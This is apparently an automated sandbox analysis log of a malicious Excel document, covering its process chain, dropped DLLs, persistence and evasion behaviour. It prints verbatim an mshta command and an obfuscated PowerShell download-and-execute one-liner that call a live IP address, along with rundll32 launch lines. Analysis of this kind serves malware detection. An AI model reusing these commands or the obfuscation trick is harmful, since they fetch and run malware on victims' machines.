Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ..".............y=.w....#.............../D9k....................................}..v....H.......0................."............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....#.............../D9k....(.Z.............................}..v............0.................Z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....'..............._l9k....E...............................}..v............0...............x.Z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+..............._l9k....E...............................}..v............0...............x.Z............................. Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............(.......:....................... Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\cmd.exe CMD.EXE /c mshta http://91.240.118.172/cc/vv/fe.html Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.172/cc/vv/fe.html Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.172/cc/vv/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\JooSee.dll",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",ipGQHkspMd Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Svccveo\pcrxj.oyh",DllRegisterServer Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",igDWgBQ Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi",DllRegisterServer Jump to behavior
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRE2EE.tmp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B5988 CreateToolhelp32Snapshot, 16_2_002B5988
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\JooSee.dll ssAAqq
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdb86)= source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdbgement.Automation.pdbBB4 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.pdb: source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdbFile source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbProg source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ws\System.pdbpdbtem.pdbIL source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\assembly\GAC_MSIL\System\2.0.0.0__b77a5c561934e089\System.pdbion source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: >ystem.pdbm source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.pdb_3 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.pdb8 source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\dll\System.pdben source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.676964302.0000000002877000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F08CC push 8B4902E0h; iretd 4_3_032F08D1
Source: C:\Windows\System32\mshta.exe Code function: 4_3_032F00C2 push 8B4902E0h; iretd 4_3_032F00C8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10032B7D push ecx; ret 9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030DFF push ecx; ret 9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10032B7D push ecx; ret 11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10030DFF push ecx; ret 11_2_10030E12
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
PE file contains an invalid checksum
Source: JooSee.dll.6.dr Static PE information: real checksum: 0x8df98 should be: 0x8ba6a

Persistence and Installation Behavior
barindex
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Drops PE files
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\ProgramData\JooSee.dll Jump to dropped file
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh (copy) Jump to dropped file
Drops PE files to the windows directory (C:\Windows)
Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh (copy) Jump to dropped file

Hooking and other Techniques for Hiding and Protection
barindex
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Svccveo\pcrxj.oyh:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File opened: C:\Windows\SysWOW64\Vinkqfnkvpzefpz\xhqzgf.ppi:Zone.Identifier read attributes | delete Jump to behavior
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_100134F0 IsIconic, 9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_100134F0 IsIconic, 11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect, 11_2_10018C9A
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\mshta.exe TID: 2548 Thread sleep time: -360000s >= -30000s Jump to behavior
Found large amount of non-executed APIs
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 3.2 %
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\SysWOW64\rundll32.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: rundll32.exe, 0000000C.00000002.551291217.000000000045A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10030334 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect, 9_2_10030334
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 9_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_10021854 __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA, 11_2_10021854
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 16_2_002B7E00 FindFirstFileW, 16_2_002B7E00
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe File Volume queried: C:\ FullSizeInformation Jump to behavior

Anti Debugging
barindex
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer, 9_2_1003D873
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 9_2_002E4087 mov eax, dword ptr fs:[00000030h] 9_2_002E4087
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 10_2_00314087 mov eax, dword ptr fs:[00000030h] 10_2_00314087
